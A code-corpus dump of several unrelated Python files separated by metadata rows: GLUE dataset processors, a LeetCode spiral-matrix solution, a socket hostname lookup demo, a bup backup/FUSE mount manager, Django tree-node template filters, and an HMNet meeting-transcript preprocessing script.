logger.info("token_type_ids: %s" % " ".join([str(x) for x in token_type_ids]))
logger.info("label: %s (id = %d)" % (example.label, label))
features.append(
InputFeatures(
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
labels=label,
)
)
return features
def _truncate_seq_pair(tokens_a, tokens_b, max_length):
while True:
total_length = len(tokens_a) + len(tokens_b)
if total_length <= max_length:
break
if len(tokens_a) > len(tokens_b):
tokens_a.pop()
else:
tokens_b.pop()
class MrpcProcessor(DataProcessor):
"""Processor for the MRPC data set (GLUE version).
Sentence pair classification task.
Determine whether the two sentences have the same meaning.
"""
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev")
def get_test_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "test.tsv")), "test")
def get_labels(self):
"""See base class."""
return ["0", "1"]
def _create_examples(self, lines, set_type):
"""Creates examples for the training, dev and test sets."""
examples = []
for (i, line) in enumerate(lines):
if i == 0:
continue
guid = f"{set_type}-{i}"
text_a = line[3]
text_b = line[4]
label = None if set_type == "test" else line[0]
examples.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))
return examples
class MnliProcessor(DataProcessor):
"""Processor for the MultiNLI data set (GLUE version).
Sentence pair classification task.
Given a premise sentence and a hypothesis sentence,
the task is to predict whether the premise entails the hypothesis (entailment),
contradicts the hypothesis (contradiction), or neither (neutral).
"""
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_tsv(os.path.join(data_dir, "dev_matched.tsv")), "dev_matched"
)
def get_test_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_tsv(os.path.join(data_dir, "test_matched.tsv")), "test_matched"
)
def get_labels(self):
"""See base class."""
return ["contradiction", "entailment", "neutral"]
def _create_examples(self, lines, set_type):
"""Creates examples for the training, dev and test sets."""
examples = []
for (i, line) in enumerate(lines):
if i == 0:
continue
guid = f"{set_type}-{line[0]}"
text_a = line[8]
text_b = line[9]
label = None if set_type.startswith("test") else line[-1]
examples.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))
return examples
class MnliMismatchedProcessor(MnliProcessor):
"""Processor for the MultiNLI Mismatched data set (GLUE version)."""
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_tsv(os.path.join(data_dir, "dev_mismatched.tsv")),
"dev_mismatched",
)
def get_test_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_tsv(os.path.join(data_dir, "test_mismatched.tsv")),
"test_mismatched",
)
class ColaProcessor(DataProcessor):
"""Processor for the CoLA data set (GLUE version).
Single sentence classification task.
Each example is a sequence of words annotated with whether it is a grammatical English sentence.
"""
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev")
def get_test_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "test.tsv")), "test")
def get_labels(self):
"""See base class."""
return ["0", "1"]
def _create_examples(self, lines, set_type):
"""Creates examples for the training, dev and test sets."""
test_mode = set_type == "test"
if test_mode:
lines = lines[1:]
text_index = 1 if test_mode else 3
examples = []
for (i, line) in enumerate(lines):
guid = f"{set_type}-{i}"
text_a = line[text_index]
label = None if test_mode else line[1]
examples.append(InputExample(guid=guid, text_a=text_a, text_b=None, label=label))
return examples
class Sst2Processor(DataProcessor):
"""Processor for the SST-2 data set (GLUE version).
Single sentence classification task.
The task is to predict the sentiment of a given sentence.
We use the two-way (positive/negative) class split, and use only sentence-level labels.
"""
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev")
def get_test_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "test.tsv")), "test")
def get_labels(self):
"""See base class."""
return ["0", "1"]
def _create_examples(self, lines, set_type):
"""Creates examples for the training, dev and test sets."""
examples = []
text_index = 1 if set_type == "test" else 0
for (i, line) in enumerate(lines):
if i == 0:
continue
guid = f"{set_type}-{i}"
text_a = line[text_index]
label = None if set_type == "test" else line[1]
examples.append(InputExample(guid=guid, text_a=text_a, text_b=None, label=label))
return examples
class StsbProcessor(DataProcessor):
"""Processor for the STS-B data set (GLUE version).
Sentence pair task but it is a regression task.
This task is to predict the similarity score of two sentences.
"""
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev")
def get_test_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "test.tsv")), "test")
def get_labels(self):
"""See base class."""
return [None]
def _create_examples(self, lines, set_type):
"""Creates examples for the training, dev and test sets."""
examples = []
for (i, line) in enumerate(lines):
if i == 0:
continue
guid = f"{set_type}-{line[0]}"
text_a = line[7]
text_b = line[8]
label = None if set_type == "test" else line[-1]
examples.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))
return examples
class QqpProcessor(DataProcessor):
"""Processor for the QQP data set (GLUE version).
Sentence pair classification task.
The task is to determine whether a pair of questions are semantically equivalent.
"""
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev")
def get_test_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "test.tsv")), "test")
def get_labels(self):
"""See base class."""
return ["0", "1"]
def _create_examples(self, lines, set_type):
"""Creates examples for the training, dev and test sets."""
test_mode = set_type == "test"
q1_index = 1 if test_mode else 3
q2_index = 2 if test_mode else 4
examples = []
for (i, line) in enumerate(lines):
if i == 0:
continue
guid = f"{set_type}-{line[0]}"
try:
text_a = line[q1_index]
text_b = line[q2_index]
label = None if test_mode else line[5]
except IndexError:
continue
examples.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))
return examples
class QnliProcessor(DataProcessor):
"""Processor for the QNLI data set (GLUE version).
Sentence pair classification task.
The task is to determine whether the context sentence contains the answer to the question.
"""
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev")
def get_test_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "test.tsv")), "test")
def get_labels(self):
"""See base class."""
return ["entailment", "not_entailment"]
def _create_examples(self, lines, set_type):
"""Creates examples for the training, dev and test sets."""
examples = []
for (i, line) in enumerate(lines):
if i == 0:
continue
guid = f"{set_type}-{line[0]}"
text_a = line[1]
text_b = line[2]
label = None if set_type == "test" else line[-1]
examples.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))
return examples
class RteProcessor(DataProcessor):
"""Processor for the RTE data set (GLUE version).
Sentence pair classification task.
Recognizing Textual Entailment.
Predict whether the two sentences is entailment or not entailment (neutral and contradiction).
"""
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev")
def get_test_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "test.tsv")), "test")
def get_labels(self):
"""See base class."""
return ["entailment", "not_entailment"]
def _create_examples(self, lines, set_type):
"""Creates examples for the training, dev and test sets."""
examples = []
for (i, line) in enumerate(lines):
if i == 0:
continue
guid = f"{set_type}-{line[0]}"
text_a = line[1]
text_b = line[2]
label = None if set_type == "test" else line[-1]
examples.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))
return examples
class WnliProcessor(DataProcessor):
"""Processor for the WNLI data set (GLUE version).
Sentence pair classification task.
The task is to predict if the sentence with the pronoun substituted is entailed
by the original sentence.
"""
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev")
def get_test_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "test.tsv")), "test")
def get_labels(self):
"""See base class."""
return ["0", "1"]
def _create_examples(self, lines, set_type):
"""Creates examples for the training, dev and test sets."""
examples = []
for (i, line) in enumerate(lines):
if i == 0:
continue
guid = f"{set_type}-{line[0]}"
text_a = line[1]
text_b = line[2]
label = None if set_type == "test" else line[-1]
examples.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))
return examples
glue_tasks_num_labels = {
"cola": 2,
"mnli": 3,
"mrpc": 2,
"sst-2": 2,
"sts-b": 1,
"qqp": 2,
"qnli": 2,
"rte": 2,
"wnli": 2,
}
glue_processors = {
"cola": ColaProcessor,
"mnli": MnliProcessor,
"mnli-mm": MnliMismatchedProcessor,
"mrpc": MrpcProcessor,
"sst-2": Sst2Processor,
"sts-b": StsbProcessor,
"qqp": QqpProcessor,
"qnli": QnliProcessor,
"rte": RteProcessor,
"wnli": WnliProcessor,
}
glue_output_modes = {
"cola": "classification",
"mnli": "classification",
"mnli-mm": "classification",
"mrpc": "classification",
"sst-2": "classification",
"sts-b": "regression",
"qqp": "classification",
"qnli": "classification",
"rte": "classification",
"wnli": "classification",
}
| 35.802281 | 100 | 0.616769 | 2,461 | 18,832 | 4.509549 | 0.106461 | 0.072445 | 0.041088 | 0.061633 | 0.640656 | 0.623356 | 0.612723 | 0.602451 | 0.561543 | 0.546044 | 0 | 0.007414 | 0.262266 | 18,832 | 525 | 101 | 35.870476 | 0.791406 | 0.18511 | 0 | 0.522659 | 0 | 0 | 0.08558 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.148036 | false | 0 | 0.009063 | 0 | 0.332326 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb43fdde5b3581f834a97b398a6070ff285448c9 | 1,204 | py | Python | spiralOrder.py | xiaochuan-cd/leetcode | 8da7fb9c1a8344f5f258936c8a7d6cd25d3b3393 | [
"MIT"
] | null | null | null | spiralOrder.py | xiaochuan-cd/leetcode | 8da7fb9c1a8344f5f258936c8a7d6cd25d3b3393 | [
"MIT"
] | null | null | null | spiralOrder.py | xiaochuan-cd/leetcode | 8da7fb9c1a8344f5f258936c8a7d6cd25d3b3393 | [
"MIT"
] | null | null | null | class Solution:
def spiralOrder(self, matrix):
"""
:type matrix: List[List[int]]
:rtype: List[int]
"""
if not matrix:
return []
lvl, lenw, lenh, ret = 0, len(matrix[0]), len(matrix), []
while lvl <= int(min(lenw, lenh)/2):
if len(ret) != lenh*lenw:
for i in range(lvl, lenw-lvl):
ret.append(matrix[lvl][i])
if len(ret) != lenh*lenw:
for i in range(lvl+1, lenh-lvl):
ret.append(matrix[i][lenw-lvl-1])
if len(ret) != lenh*lenw:
for i in range(lenw-lvl-2, -1+lvl, -1):
ret.append(matrix[lenh-lvl-1][i])
if len(ret) != lenh*lenw:
for i in range(lenh-lvl-2, lvl, -1):
ret.append(matrix[i][lvl])
lvl += 1
return ret
if __name__ == "__main__":
print(Solution().spiralOrder(
[
[1]
]
))
print(Solution().spiralOrder(
[
[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12],
[13, 14, 15, 16],
[17, 18, 19, 20]
]
))
| 26.755556 | 65 | 0.41113 | 147 | 1,204 | 3.312925 | 0.333333 | 0.049281 | 0.065708 | 0.098563 | 0.316222 | 0.238193 | 0.238193 | 0.238193 | 0.238193 | 0.182752 | 0 | 0.064327 | 0.431894 | 1,204 | 44 | 66 | 27.363636 | 0.647661 | 0.039037 | 0 | 0.228571 | 0 | 0 | 0.007111 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028571 | false | 0 | 0 | 0 | 0.114286 | 0.057143 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb44989d1b925d469bd603867f4a7ffaa3d4a4d3 | 400 | py | Python | lang/py/pylib/11/socket/function/gethostbyname_ex.py | ch1huizong/learning | 632267634a9fd84a5f5116de09ff1e2681a6cc85 | [
"MIT"
] | null | null | null | lang/py/pylib/11/socket/function/gethostbyname_ex.py | ch1huizong/learning | 632267634a9fd84a5f5116de09ff1e2681a6cc85 | [
"MIT"
] | null | null | null | lang/py/pylib/11/socket/function/gethostbyname_ex.py | ch1huizong/learning | 632267634a9fd84a5f5116de09ff1e2681a6cc85 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding:UTF-8 -*-
import socket
for host in ['homer','www','www.python.org','nosuchnamenamenameche']:
print host
try:
hostname, aliases, addresses = socket.gethostbyname_ex(host)
print' Hostname:',hostname
print' Aliases:',aliases
print' Addresses:',addresses
except socket.error as msg:
print'ERROR:',msg
print
| 25 | 69 | 0.63 | 46 | 400 | 5.456522 | 0.586957 | 0.063745 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003257 | 0.2325 | 400 | 15 | 70 | 26.666667 | 0.814332 | 0.1025 | 0 | 0 | 0 | 0 | 0.229692 | 0.058824 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.090909 | null | null | 0.545455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
bb44aa42ddd32a1beb60abcb2a915654994335c3 | 7,786 | py | Python | bups/manager.py | emersion/bups | 95dac7fabe8261dfff3bccad1e384af07c702945 | [
"MIT"
] | 106 | 2015-01-02T11:11:39.000Z | 2022-01-09T08:03:30.000Z | bups/manager.py | emersion/bups | 95dac7fabe8261dfff3bccad1e384af07c702945 | [
"MIT"
] | 33 | 2015-01-01T15:01:38.000Z | 2020-09-06T15:13:49.000Z | bups/manager.py | emersion/bups | 95dac7fabe8261dfff3bccad1e384af07c702945 | [
"MIT"
] | 15 | 2015-02-01T10:38:20.000Z | 2022-02-08T21:45:44.000Z | import os
import time
import subprocess
import tempfile
import re
from worker import BupWorker
#from sudo import sudo
from fuse.root import FuseRoot
from fuse.bup import FuseBup
from fuse.sshfs import FuseSshfs
from fuse.google_drive import FuseGoogleDrive
from fuse.encfs import FuseEncfs
def noop(*args):
pass
class BupManager:
def __init__(self, cfg, sudo_worker = None):
self.config = cfg
self.sudo_worker = sudo_worker
self.mounted = False
self.bup = BupWorker()
self.bup_mounter = None
# FS parents
mount_cfg = self.config["mount"]
mount_type = mount_cfg.get("type", "")
if mount_type == "":
self.parents = []
elif mount_type == "google_drive":
self.parents = [FuseGoogleDrive(mount_cfg)]
elif mount_type == "sshfs":
self.parents = [FuseSshfs(mount_cfg)]
else:
self.parents = [FuseRoot(mount_cfg)]
if mount_cfg.get("encrypt", False):
self.parents.append(FuseEncfs())
def backup(self, callbacks={}):
callbacks_names = ["onstatus", "onerror", "onprogress", "onfinish", "onabord"]
for name in callbacks_names:
if not name in callbacks:
callbacks[name] = noop
ctx = {}
def backupDir(dir_data):
dirpath = dir_data["path"].encode("ascii")
backupName = dir_data["name"].encode("ascii")
excludePaths = [x.encode("ascii") for x in dir_data.get("exclude", [])]
excludeRxs = [x.encode("ascii") for x in dir_data.get("excluderx", [])]
ctx = {
"path": dirpath,
"name": backupName
}
def status2progress(line):
m = re.search("Indexing:\s*(\d+)((?:,\s*done)?)\s*\((\d+) paths/s\)", line)
if m is not None:
percentage = None
if m.group(2) != "":
percentage = 100
return {
'status': 'indexing',
'percentage': percentage,
'total_paths': int(m.group(1)),
'paths_per_sec': int(m.group(3))
}
m = re.search("Reading index:\s*(\d+)((?:,\s*done)?)", line)
if m is not None:
percentage = None
if m.group(2) != "":
percentage = 100
return {
'status': 'reading_index',
'percentage': percentage,
'files_done': int(m.group(1))
}
m = re.search("Saving:\s*([\d.]+)%\s*\((\d+)/(\d+)k, (\d+)/(\d+) files\)", line)
if m is not None:
return {
'status': 'saving',
'percentage': float(m.group(1)),
'bytes_done': int(m.group(2)),
'bytes_total': int(m.group(3)),
'files_done': int(m.group(4)),
'files_total': int(m.group(5))
}
return None
def onprogress(data):
return callbacks["onprogress"](data, ctx)
def onstatus(line):
progress = status2progress(line)
if progress is not None:
return callbacks["onprogress"](progress, ctx)
return callbacks["onstatus"](line, ctx)
callbacks["onstatus"]("Backing up "+backupName+": indexing files...", ctx)
self.bup.index(dirpath, {
"exclude_paths": excludePaths,
"exclude_rxs": excludeRxs,
"one_file_system": dir_data.get("onefilesystem", False)
}, {
"onprogress": onprogress,
"onstatus": onstatus
})
callbacks["onstatus"]("Backing up "+backupName+": saving files...", ctx)
self.bup.save(dirpath, {
"name": backupName,
"progress": True
}, {
"onprogress": onprogress,
"onstatus": onstatus
})
cfg = self.config
callbacks["onstatus"]("Mounting filesystem...", ctx)
if not self.mount_parents(callbacks):
callbacks["onabord"]({}, ctx)
return
callbacks["onstatus"]("Initializing bup...", ctx)
self.bup.init({
"onstatus": lambda line: callbacks["onstatus"](line, ctx)
})
for dir_data in cfg["dirs"]:
backupDir(dir_data)
time.sleep(1)
callbacks["onstatus"]("Unmounting filesystem...", ctx)
self.unmount_parents(callbacks)
callbacks["onstatus"]('Backup finished.', ctx)
callbacks["onfinish"]({}, ctx)
def restore(self, opts, callbacks={}):
callbacks_names = ["onstatus", "onerror", "onprogress", "onfinish", "onabord"]
for name in callbacks_names:
if not name in callbacks:
callbacks[name] = noop
callbacks["onstatus"]("Mounting filesystem...")
if not self.mount_parents(callbacks):
callbacks["onabord"]()
return
from_path = opts.get("from").encode("ascii")
to_path = opts.get("to").encode("ascii")
callbacks["onstatus"]("Restoring "+from_path+" to "+to_path+"...")
self.bup.restore(from_path, to_path, callbacks)
time.sleep(1)
callbacks["onstatus"]("Unmounting filesystem...")
self.unmount_parents(callbacks)
callbacks["onstatus"]("Restoration finished.")
callbacks["onfinish"]()
def mount(self, callbacks={}):
if not "onstatus" in callbacks:
callbacks["onstatus"] = noop
if not "onerror" in callbacks:
callbacks["onerror"] = noop
if not "onready" in callbacks:
callbacks["onready"] = noop
if not "onabord" in callbacks:
callbacks["onabord"] = noop
cfg = self.config
callbacks["onstatus"]("Mounting filesystem...")
if not self.mount_parents({
'onerror': lambda msg, ctx: callbacks["onerror"](msg)
}):
callbacks["onabord"]()
return
callbacks["onstatus"]("Initializing bup...")
mounter = FuseBup(self.bup)
mount_path = tempfile.mkdtemp(prefix="bups-bup-")
try:
mounter.mount(mount_path)
except Exception, e:
callbacks["onerror"]("WARN: "+str(e)+"\n")
self.bup_mounter = mounter
callbacks["onstatus"]('Bup fuse filesystem mounted.')
self.mounted = True
callbacks["onready"]({
"path": mounter.get_inner_path()
})
def unmount(self, callbacks={}):
if not "onstatus" in callbacks:
callbacks["onstatus"] = noop
if not "onerror" in callbacks:
callbacks["onerror"] = noop
if not "onfinish" in callbacks:
callbacks["onfinish"] = noop
if self.bup_mounter is None:
return
callbacks["onstatus"]("Unmounting bup filesystem...")
try:
self.bup_mounter.unmount()
except Exception, e:
callbacks["onerror"]("WARN: "+str(e)+"\n")
callbacks["onstatus"]("Unmounting filesystem...")
self.unmount_parents({
'onerror': lambda msg, ctx: callbacks["onerror"](msg)
})
self.mounted = False
callbacks["onfinish"]({})
def parents_need_sudo(self):
for mounter in self.parents:
if isinstance(mounter, FuseRoot):
return True
return False
def mount_log(self, msg):
if self.sudo_worker is not None:
return
print(msg)
def mount_parents(self, callbacks={}):
if not "onerror" in callbacks:
callbacks["onerror"] = noop
if self.parents_need_sudo() and self.sudo_worker is not None:
res = self.sudo_worker.proxy_command("mount", callbacks)
if res["success"]:
self.bup.set_dir(res["bup_path"])
return res["success"]
mount_cfg = self.config["mount"]
last_mount_path = self.bup.get_default_dir()
if mount_cfg.get("type", "") == "" and mount_cfg.get("path", "") != "":
last_mount_path = os.path.expanduser(mount_cfg["path"])
for mounter in self.parents:
mount_path = tempfile.mkdtemp(prefix="bups-"+mounter.get_type()+"-")
self.mount_log("Mounting "+mounter.get_type()+" on "+mount_path)
try:
mounter.mount(mount_path, last_mount_path)
except Exception, e:
callbacks["onerror"]("ERR: "+str(e)+"\n", {})
return False
last_mount_path = mounter.get_inner_path()
self.mount_log("Backup dir is "+last_mount_path)
self.bup.set_dir(last_mount_path)
return True
def unmount_parents(self, callbacks={}):
if not "onerror" in callbacks:
callbacks["onerror"] = noop
if self.parents_need_sudo() and self.sudo_worker is not None:
return self.sudo_worker.proxy_command("unmount", callbacks)["success"]
for mounter in reversed(self.parents):
self.mount_log("Unmounting "+mounter.get_type()+" on "+mounter.get_mount_path())
try:
mounter.unmount()
except Exception, e:
callbacks["onerror"]("ERR: "+str(e)+"\n", {})
return False
return True
| 25.953333 | 84 | 0.656563 | 984 | 7,786 | 5.079268 | 0.158537 | 0.064626 | 0.044018 | 0.012005 | 0.444378 | 0.353742 | 0.322929 | 0.262505 | 0.231693 | 0.181673 | 0 | 0.003128 | 0.178911 | 7,786 | 299 | 85 | 26.040134 | 0.778664 | 0.00411 | 0 | 0.39485 | 0 | 0.004292 | 0.190789 | 0.013932 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.004292 | 0.04721 | null | null | 0.004292 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb464176e752765ae17771663cfb6e6d7f9714b9 | 1,177 | py | Python | integreat_cms/cms/templatetags/tree_filters.py | Integreat/cms-v2 | c79a54fd5abb792696420aa6427a5e5a356fa79c | [
"Apache-2.0"
] | 21 | 2018-10-26T20:10:45.000Z | 2020-10-22T09:41:46.000Z | integreat_cms/cms/templatetags/tree_filters.py | Integreat/cms-v2 | c79a54fd5abb792696420aa6427a5e5a356fa79c | [
"Apache-2.0"
] | 392 | 2018-10-25T08:34:07.000Z | 2020-11-19T08:20:30.000Z | integreat_cms/cms/templatetags/tree_filters.py | Integreat/cms-v2 | c79a54fd5abb792696420aa6427a5e5a356fa79c | [
"Apache-2.0"
] | 23 | 2019-03-06T17:11:35.000Z | 2020-10-16T04:36:41.000Z | """
This is a collection of tags and filters for models which inherit from the MPTT model
:class:`~integreat_cms.cms.models.abstract_tree_node.AbstractTreeNode`
(:class:`~integreat_cms.cms.models.pages.page.Page` and
:class:`~integreat_cms.cms.models.languages.language_tree_node.LanguageTreeNode`).
"""
from django import template
register = template.Library()
@register.filter
def get_descendant_ids(node):
"""
This filter returns the ids of all the node's descendants.
:param node: The requested node
:type node: ~integreat_cms.cms.models.abstract_tree_node.AbstractTreeNode
:return: The list of all the node's descendants' ids
:rtype: list [ int ]
"""
return [
descendant.id for descendant in node.get_cached_descendants(include_self=True)
]
@register.filter
def get_children_ids(node):
"""
This filter returns the ids of all the node's direct children.
:param node: The requested node
:type node: ~integreat_cms.cms.models.abstract_tree_node.AbstractTreeNode
:return: The list of all the node's children's ids
:rtype: list [ int ]
"""
return [child.id for child in node.cached_children]
| 29.425 | 86 | 0.731521 | 167 | 1,177 | 5.02994 | 0.347305 | 0.071429 | 0.089286 | 0.125 | 0.57619 | 0.458333 | 0.432143 | 0.432143 | 0.369048 | 0.369048 | 0 | 0 | 0.172472 | 1,177 | 39 | 87 | 30.179487 | 0.862423 | 0.661852 | 0 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.1 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb4652a753ab3b1a67b9185a0d10ad240ff3d243 | 5,220 | py | Python | Preprocess.py | Rawan19/HMNet | 2aa8de20558412c1adb15fac69f18f50d6f59227 | [
"MIT"
] | null | null | null | Preprocess.py | Rawan19/HMNet | 2aa8de20558412c1adb15fac69f18f50d6f59227 | [
"MIT"
] | null | null | null | Preprocess.py | Rawan19/HMNet | 2aa8de20558412c1adb15fac69f18f50d6f59227 | [
"MIT"
] | null | null | null | import json
import spacy
from nltk.tokenize import word_tokenize
import nltk
nltk.download('punkt')
# print("argss:")
# print(sys.argv[0])
# text = sys.argv[0]
print("Preprocessing the input file ...")
def preprocess_raw(raw_text : str) :
json_dict_outer = {}
json_dict = {}
json_dict_outer['id']="1"
nlp = spacy.load('en', parser = False)
# nlp_spacy = spacy.load("en_core_web_sm")
POS = {w: i for i, w in enumerate([''] + list(nlp.tagger.labels))}
ENT = {w: i for i, w in enumerate([''] + nlp.entity.move_names)}
name_role_dict = {'A' : 'PM' , 'B' : 'ID' , 'C' :'UI' , 'D' :'ME'}
list_dicts = []
turns = text.split('\n')
for turn in turns :
json_dict = {}
if len(turn) < 1 : continue
name = turn.split(":", 1)[0]
role_name = name_role_dict[name]
json_dict['speaker'] = name
json_dict['role'] = role_name
word_text = turn.split(":", 1)[1]
tokenized_text = word_tokenize(word_text)
json_dict['utt'] = {}
output = {'word': [], 'pos_id': [],'ent_id': []}
output['word'] = tokenized_text
for token in nlp(word_text):
pos = token.tag_
output['pos_id'].append(POS[pos] if pos in POS else 0)
ent = 'O' if token.ent_iob_ == 'O' else (token.ent_iob_ + '-' + token.ent_type_)
output['ent_id'].append(ENT[ent] if ent in ENT else 0)
json_dict['utt'] = output
list_dicts.append(json_dict)
json_dict_outer['meeting'] = list_dicts
json_dict_outer['summary']=[""]
with open('test_raw2.jsonl', 'w') as outfile:
for entry in [json_dict_outer]:
# print(entry)
json.dump(entry, outfile)
outfile.write('\n')
import gzip
with open('test_raw2.jsonl', 'rb') as f_in, gzip.open('ExampleRawData/meeting_summarization/AMI_proprec/test/test_raw2.jsonl.gz', 'wb') as f_out:
f_out.writelines(f_in)
print("Prerpocessing is Complete! the new test file was created with the following path: ExampleRawData/meeting_summarization/AMI_proprec/test/test_raw2.jsonl.gz")
# text = """
# Ashwin Swarup:Alright, let's let's start then. So, welcome to the Daily call. So I wanted a basic update on where we are on ditto, so mitesh can even brought update on that.
# Mitesh Gupta: Oh yeah. So deter we have finally our position was in this Marketplace and we have got our latest app available on the marketplace with the updates, about the installation steps and new screenshots. We are waiting to put a new video so that will get a new release next week. Next early. Next week, as well as we're in talk with the Eric, the representative
# Mitesh Gupta:person of zendes where you can help us with the marketing of video. So we are all
# Ashwin Swarup:No. Yeah I also got a video the latest video from anitage and looks good. So I send it for approval to my. So let's see if If you approves it, I will set it up on the detail. but,
# Mitesh Gupta:Corporation, then we can work.
# Ashwin Swarup:But on the whole, it looks good.
# Mitesh Gupta:Yeah. And as well as what I have seen. I have also seen the Google analytics page for dito and I've seen around 8 to 15 requests are there. Like people have visited to our little page,
# Ashwin Swarup:That's good. So I mean, the initial days two days since deployment. Let's see how it goes. All right, what's the status on Chiron?
# Siddhant Bane:Yeah. So in terms of testing we have we are done with our unit tests and today we have pushed them I think with it can review them and basically approve our pull request and we will be done with that apart from that we are working on the chat server where like we discussed in yesterday's meeting, we are going to incorporate handoff feature and Also, the scalability issues that we were facing, we're going to address. From that Shashank can update.
# Shashank M:Oh yeah. So from my side, I had a few Test cases remaining. And as, after that, udit also told me to make a few more code changes to the API for the document passing an intense generation. So we made a, we made the remaining changes and I've pushed the code and with the HTTP action file on the HTTP download and upload code, which I had written. So I've put the changes for that as well. So I just have to sit with Throne to make the UI changes. So yeah so after that I'm done with the unit test case now I just have a few Service Test cases remaining. So once I'm done with that, I'll push it to get
# Ashwin Swarup:And the knowledge graph test cases are also done the part where we were trying to do question augmentation test cases now that that needs to still start.
# Shashank M:With the knowledge craft test cases. So it's divided into two and that one is the document passing. And then the Generation. The addition of the training.
# Ashwin Swarup: Yeah.
